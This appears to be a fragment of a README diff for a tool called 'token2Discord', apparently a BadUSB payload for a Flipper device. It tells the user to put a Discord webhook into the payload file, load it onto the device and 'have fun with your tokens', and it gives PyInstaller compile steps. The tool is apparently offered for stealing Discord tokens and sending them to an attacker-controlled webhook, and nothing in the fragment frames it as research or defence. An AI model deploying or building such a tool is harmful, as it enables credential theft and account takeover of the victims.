CharlesTheGreat77/token2Discord/README.md

 Input your discord webhook in the payload file (txt file)
 $webhook = 'DISCORD_WEBHOOK'
 ```
+Save token2Discord.txt to flipper, and have fun with your tokens!!!

 # Compile (if you want your own)
 • Be sure PyInstaller is installed